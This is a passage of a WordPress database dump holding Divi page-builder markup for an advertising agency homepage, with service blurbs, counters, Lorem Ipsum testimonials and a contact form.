_builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:18:57','2020-08-07 20:18:57','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (609,1,'2020-08-07 20:19:09','2020-08-07 20:19:09','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand 